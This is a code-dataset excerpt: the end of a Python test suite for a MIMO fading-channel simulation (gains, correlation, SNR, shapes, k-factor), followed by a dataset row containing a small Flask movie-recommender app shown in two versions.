        def check_chan_gain(mod, chan):
            # Propagate a long random message; the received energy should be
            # the transmitted symbol energy times the number of Tx antennas.
            msg = choice(mod, self.msg_length)
            chan.propagate(msg)

            P_msg = signal_power(msg)
            P_unnoisy = signal_power(chan.unnoisy_output)

            assert_allclose(P_unnoisy, P_msg * chan.nb_tx, rtol=0.2,
                            err_msg='Channel add or remove energy')

        def expo_correlation(t, r):
            # Build exponential correlation matrices whose (i, j) element is
            # t**(j - i) (Tx side) resp. r**(j - i) (Rx side).
            expo_tx = fromiter((j - i for i in range(chan.nb_tx) for j in range(chan.nb_tx)), int, chan.nb_tx ** 2)
            expo_rx = fromiter((j - i for i in range(chan.nb_rx) for j in range(chan.nb_rx)), int, chan.nb_rx ** 2)
            expo_tx = expo_tx.reshape(chan.nb_tx, chan.nb_tx)
            expo_rx = expo_rx.reshape(chan.nb_rx, chan.nb_rx)
            return t ** expo_tx, r ** expo_rx

        def check_correlation(chan, Rt, Rr):
            # Estimate the correlation matrix of the vectorized channel and
            # compare it to the Kronecker product of the desired Tx/Rx ones.
            nb_ant = chan.nb_tx * chan.nb_rx
            Rdes = kron(Rt, Rr)
            H = chan.channel_gains
            Ract = zeros_like(Rdes)
            for i in range(len(H)):
                Ract += H[i].T.reshape(nb_ant, 1).dot(H[i].T.reshape(1, nb_ant).conj())
            Ract /= len(H)
            assert_allclose(Rdes, Ract, atol=0.05,
                            err_msg='Wrong correlation matrix')

        # Invalid fading parameters must be rejected at construction.
        with assert_raises(ValueError):
            MIMOFlatChannel(nb_tx, nb_tx, 0, (ones((nb_tx, nb_tx)), ones((nb_tx, nb_tx)), ones((nb_rx, nb_rx))))

        chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
        prod_nb = nb_tx * nb_rx

        # Real channel
        for mod in self.real_mods:
            with assert_raises(ValueError):
                chan.fading_param = (ones((nb_tx, nb_tx)), ones((nb_tx, nb_tx)), ones((nb_rx, nb_rx)))

            # Rayleigh fading set by hand (zero mean, identity correlations).
            chan.fading_param = (zeros((nb_rx, nb_tx)), identity(nb_tx), identity(nb_rx))
            check_chan_gain(mod, chan)

            # Rician fading set by hand: the mean carries 75% of the power,
            # the correlated part the remaining 25%.
            mean = randn(nb_rx, nb_tx)
            mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
            Rt = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
            Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
            chan.fading_param = (mean, Rt, Rr)
            check_chan_gain(mod, chan)

            # Helper-built uncorrelated Rayleigh fading.
            chan.uncorr_rayleigh_fading(float)
            check_chan_gain(mod, chan)
            assert_allclose(chan.k_factor, 0,
                            err_msg='Wrong k-factor with uncorrelated Rayleigh fading')

            # Helper-built uncorrelated Rician fading with k = 10.
            mean = randn(nb_rx, nb_tx)
            chan.uncorr_rician_fading(mean, 10)
            check_chan_gain(mod, chan)
            assert_allclose(chan.k_factor, 10,
                            err_msg='Wrong k-factor with uncorrelated rician fading')

        # Complex channel
        for mod in self.all_mods:
            with assert_raises(ValueError):
                chan.fading_param = (ones((nb_tx, nb_tx)), ones((nb_tx, nb_tx)), ones((nb_rx, nb_rx)))

            # Rayleigh fading set by hand: zero mean, unit variance.
            chan.fading_param = (zeros((nb_rx, nb_tx), complex), identity(nb_tx), identity(nb_rx))
            check_chan_gain(mod, chan)
            assert_allclose(chan.channel_gains.mean(), 0, atol=1e-2,
                            err_msg='Wrong channel mean with complex channel')
            assert_allclose(chan.channel_gains.var(), 1, atol=5e-2,
                            err_msg='Wrong channel variance with complex channel')

            # Rician fading set by hand; the per-antenna mean must survive
            # averaging over the propagated frames.
            mean = randn(nb_rx, nb_tx) + 1j * randn(nb_rx, nb_tx)
            mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
            Rt = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
            Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
            chan.fading_param = (mean, Rt, Rr)
            check_chan_gain(mod, chan)
            assert_allclose(chan.channel_gains.mean(0).real, mean.real, atol=0.1,
                            err_msg='Wrong channel mean with complex channel')
            assert_allclose(chan.channel_gains.mean(0).imag, mean.imag, atol=0.1,
                            err_msg='Wrong channel mean with complex channel')

            # Helper-built uncorrelated Rayleigh fading.
            chan.uncorr_rayleigh_fading(complex)
            check_chan_gain(mod, chan)
            assert_allclose(chan.k_factor, 0,
                            err_msg='Wrong k-factor with uncorrelated Rayleigh fading')

            # Helper-built uncorrelated Rician fading with k = 10.
            mean = randn(nb_rx, nb_tx) + randn(nb_rx, nb_tx) * 1j
            chan.uncorr_rician_fading(mean, 10)
            check_chan_gain(mod, chan)
            assert_allclose(chan.k_factor, 10,
                            err_msg='Wrong k-factor with uncorrelated rician fading')

            # Exponentially correlated Rayleigh fading; also verify the
            # realized correlation against the closed-form matrices.
            chan.expo_corr_rayleigh_fading(exp(-0.2j * pi), exp(-0.1j * pi))
            check_chan_gain(mod, chan)
            assert_allclose(chan.k_factor, 0,
                            err_msg='Wrong k-factor with correlated Rayleigh fading')
            Rt, Rr = expo_correlation(exp(-0.2j * pi), exp(-0.1j * pi))
            check_correlation(chan, Rt, Rr)

            # Exponentially correlated Rician fading with k = 10.
            mean = randn(nb_rx, nb_tx) + randn(nb_rx, nb_tx) * 1j
            chan.expo_corr_rician_fading(mean, 10, exp(-0.1j * pi), exp(-0.2j * pi))
            check_chan_gain(mod, chan)
            assert_allclose(chan.k_factor, 10,
                            err_msg='Wrong k-factor with correlated rician fading')

            # Same fading helpers with the extra trailing arguments
            # (presumably per-side correlation exponents — TODO confirm
            # against the commpy API documentation).
            chan.expo_corr_rayleigh_fading(exp(-0.2j * pi), exp(-0.1j * pi), 1, 0.5)
            check_chan_gain(mod, chan)
            assert_allclose(chan.k_factor, 0,
                            err_msg='Wrong k-factor with correlated Rayleigh fading')

            mean = randn(nb_rx, nb_tx) + randn(nb_rx, nb_tx) * 1j
            chan.expo_corr_rician_fading(mean, 5, exp(-0.1j * pi), exp(-0.2j * pi), 3, 2)
            check_chan_gain(mod, chan)
            assert_allclose(chan.k_factor, 5,
                            err_msg='Wrong k-factor with correlated rician fading')
class TestMIMOSpectular(MIMOTestCase):
    """Check the deterministic specular (line-of-sight) component."""

    def __init__(self):
        super(TestMIMOSpectular, self).__init__()

    def do(self, nb_tx, nb_rx):
        """Reject invalid arguments, then compare against the closed form."""
        channel = MIMOFlatChannel(nb_tx, nb_rx, 0)

        # Argument tuples containing a negative value must be rejected.
        with assert_raises(ValueError):
            channel.specular_compo(0, -1, 0, 1)
        with assert_raises(ValueError):
            channel.specular_compo(0, 1, 0, -1)

        # Closed-form phase ramp across the Rx and Tx arrays.
        expected = array([[exp(1j * 2 * pi * (rx * 1 * cos(0.5) - tx * 0.1 * cos(2)))
                           for tx in range(nb_tx)]
                          for rx in range(nb_rx)])
        assert_allclose(channel.specular_compo(2, 0.1, 0.5, 1), expected, rtol=0.02,
                        err_msg='Wrong specular component')
@dec.slow
class TestMIMONoiseGeneration(MIMOTestCase):
    """Check the measured SNR of a MIMO channel against the configured one."""

    def __init__(self):
        super(TestMIMONoiseGeneration, self).__init__()

    def do(self, nb_tx, nb_rx):
        seed(17121996)  # fixed seed: all checks below are statistical

        def check_noise(mod, chan, corrected_SNR_lin):
            msg = choice(mod, self.msg_length)
            chan.propagate(msg)

            P_msg = signal_power(msg)
            P_noise = signal_power(chan.noises)

            assert_allclose(abs(chan.noises.mean()), 0., atol=0.5,
                            err_msg='Noise mean is not 0')
            if corrected_SNR_lin == inf:
                # noise_std == 0: there must be no noise power at all.
                assert_allclose(P_noise, 0, atol=1e-2,
                                err_msg='There is noise that should not be here')
            else:
                # Total transmitted power is nb_tx times the symbol power.
                assert_allclose(chan.nb_tx * P_msg / P_noise, corrected_SNR_lin, atol=0.2,
                                err_msg='Wrong SNR')

        # Uncorrelated complex Rayleigh fading.
        fading_param = zeros((nb_rx, nb_tx), complex), identity(nb_tx), identity(nb_rx)
        chan = MIMOFlatChannel(nb_tx, nb_rx, fading_param=fading_param)
        for mod in self.all_mods:
            chan.noise_std = 0
            check_noise(mod, chan, inf)
            chan.set_SNR_lin(6, Es=signal_power(mod))
            check_noise(mod, chan, 6)
            # A code rate of .5 halves the effective SNR.
            chan.set_SNR_lin(6, .5, signal_power(mod))
            check_noise(mod, chan, 3)
            chan.set_SNR_dB(0, Es=signal_power(mod))
            check_noise(mod, chan, 1)
            chan.set_SNR_dB(0, .5, signal_power(mod))
            check_noise(mod, chan, .5)
class TestMIMOTypeCheck(MIMOTestCase):
    """Check input dtype validation of the MIMO channel."""

    def __init__(self):
        super(TestMIMOTypeCheck, self).__init__()

    def do(self, nb_tx, nb_rx):
        """Complex symbols through a real channel must raise TypeError."""
        channel = MIMOFlatChannel(nb_tx, nb_rx, 0)
        mixed_msg = array((1, 1j))
        with assert_raises(TypeError):
            channel.propagate(mixed_msg)
class TestMIMOShapes(MIMOTestCase):
    """Check the shapes of every channel output, with and without padding."""

    def __init__(self):
        super(TestMIMOShapes, self).__init__()

    def do(self, nb_tx, nb_rx):
        """Propagate 2*nb_tx symbols (exact fit), then 2*nb_tx + 1 (padded)."""
        # (extra symbols, resulting number of frames, label for messages)
        cases = ((0, 2, 'without padding'), (1, 3, 'with padding'))
        for extra, frames, label in cases:
            channel = MIMOFlatChannel(nb_tx, nb_rx, 0)
            received = channel.propagate(ones(nb_tx * 2 + extra))
            message = 'Wrong channel shape ' + label
            assert_array_equal(channel.channel_gains.shape, (frames, nb_rx, nb_tx),
                               err_msg=message)
            assert_array_equal(channel.noises.shape, (frames, nb_rx),
                               err_msg=message)
            assert_array_equal(channel.unnoisy_output.shape, (frames, nb_rx),
                               err_msg=message)
            assert_array_equal(received.shape, (frames, nb_rx),
                               err_msg=message)
class TestMIMOkFactor(MIMOTestCase):
    """Check the Rician k-factor computation for MIMO fading parameters."""

    def __init__(self):
        super(TestMIMOkFactor, self).__init__()

    def do(self, nb_tx, nb_rx):
        seed(17121996)
        prod_nb = nb_tx * nb_rx

        # Real channel
        chan = MIMOFlatChannel(nb_tx, nb_rx)
        # Default fading is Rayleigh (zero mean) => k-factor 0.
        assert_allclose(chan.k_factor, 0,
                        err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
        # Mean scaled to 75% of the total power, correlations to 25% => k = 3.
        mean = randn(nb_rx, nb_tx)
        mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
        Rs = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
        Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
        chan.fading_param = mean, Rs, Rr
        assert_allclose(chan.k_factor, 3,
                        err_msg='Wrong k-factor with rician fading in SISO channels')

        # Complex channel
        chan.fading_param = (zeros((nb_rx, nb_tx), complex), identity(nb_tx), identity(nb_rx))
        assert_allclose(chan.k_factor, 0,
                        err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
        # Same 75/25 power split with a complex mean => k = 3.
        mean = randn(nb_rx, nb_tx) + 1j * randn(nb_rx, nb_tx)
        mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
        Rs = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
        Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
        chan.fading_param = (mean, Rs, Rr)
        assert_allclose(chan.k_factor, 3,
                        err_msg='Wrong k-factor with rician fading in SISO channels')
# Run the full test suite when this file is executed as a script.
if __name__ == "__main__":
    run_module_suite()
| true | true |
f72332b713eea64f27d550219316fa52fa69d638 | 2,397 | py | Python | movieapp/application.py | Ketank21/Movie_recommendation | 444e85669689cc0d86c0aa11d708eaad17e6115b | [
"MIT"
] | null | null | null | movieapp/application.py | Ketank21/Movie_recommendation | 444e85669689cc0d86c0aa11d708eaad17e6115b | [
"MIT"
] | null | null | null | movieapp/application.py | Ketank21/Movie_recommendation | 444e85669689cc0d86c0aa11d708eaad17e6115b | [
"MIT"
] | null | null | null | '''
root module of the recommender app
'''
from flask import Flask, request, render_template
from recommender import recommend_nmf, recommend_random,recommend_neighbors,recommend_popular
from utils import movies,ratings,df_mov_avg_cnt, search_title,movie_to_id,id_to_movie,get_movieId
#where we define our Flask object to be used to render our views
app = Flask(__name__) # __name__ defines this script as the root of our movieapp
# decorator that routes the function to the site root URL
@app.route('/')
def landing_page():
    '''
    Render the landing page where the user enters movie titles and
    picks a recommendation strategy.
    '''
    return render_template('landing_page.html')
@app.route('/my-awesome-recommender/')
def recommender():
    '''
    Turn the submitted movie titles into a list of recommendations.

    Query parameters:
        movie  -- repeated parameter holding the user's movie titles
        choice -- recommendation strategy selected in the form
    '''
    # Map each strategy name sent by the form to its recommender function.
    strategies = {
        'Random': recommend_random,
        'Tailored': recommend_nmf,
        'people like you': recommend_neighbors,
        'popular': recommend_popular,
    }
    choice = request.args.get('choice')
    # Raw titles typed by the user, converted to movieIds via fuzzy matching.
    userquery = request.args.getlist('movie')
    userquery_to_movieId = get_movieId(userquery)
    # Bug fix: an unknown or missing `choice` used to leave `recs` unbound
    # and crash with an UnboundLocalError (HTTP 500); fall back to random
    # recommendations instead.
    recommend = strategies.get(choice, recommend_random)
    recs = recommend(userquery_to_movieId, k=5)
    return render_template('recommender.html', recs=recs, choice=choice)
# parameterized URL: movieId is parsed from the path as an int
@app.route('/movie/<int:movieId>')
def movie_info(movieId):
    '''
    Render the detail page for a single movie.
    '''
    indexed_movies = movies.set_index('movieId')
    movie = indexed_movies.loc[movieId]
    return render_template('movie_info.html', movie=movie, movieId=movieId)
if __name__ == '__main__':
    # debug=True restarts the server after edits and prints verbose errors
    # in the terminal (development only).
    app.run(debug=True)
| 34.242857 | 102 | 0.71506 |
from flask import Flask, request, render_template
from recommender import recommend_nmf, recommend_random,recommend_neighbors,recommend_popular
from utils import movies,ratings,df_mov_avg_cnt, search_title,movie_to_id,id_to_movie,get_movieId
app = Flask(__name__)
# Entry page: the user types movie titles and picks a strategy here.
@app.route('/')
def landing_page():
    return render_template('landing_page.html')
@app.route('/my-awesome-recommender/')
def recommender():
    """Turn the submitted movie titles into a list of recommendations.

    Query parameters:
        movie  -- repeated parameter holding the user's movie titles
        choice -- recommendation strategy selected in the form
    """
    # Map each strategy name sent by the form to its recommender function.
    strategies = {
        'Random': recommend_random,
        'Tailored': recommend_nmf,
        'people like you': recommend_neighbors,
        'popular': recommend_popular,
    }
    choice = request.args.get('choice')
    userquery = request.args.getlist('movie')
    userquery_to_movieId = get_movieId(userquery)
    # Bug fix: an unknown or missing `choice` used to leave `recs` unbound
    # and crash with an UnboundLocalError (HTTP 500); fall back to random
    # recommendations instead.
    recommend = strategies.get(choice, recommend_random)
    recs = recommend(userquery_to_movieId, k=5)
    return render_template('recommender.html', recs=recs, choice=choice)
# Parameterized URL: movieId is parsed from the path as an int.
@app.route('/movie/<int:movieId>')
def movie_info(movieId):
    """Render the detail page for a single movie."""
    movie=movies.set_index('movieId').loc[movieId]
    return render_template('movie_info.html', movie=movie, movieId=movieId)
if __name__ == '__main__':
    # debug=True restarts the server after edits and prints verbose errors
    # in the terminal (development only).
    app.run(debug=True)
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.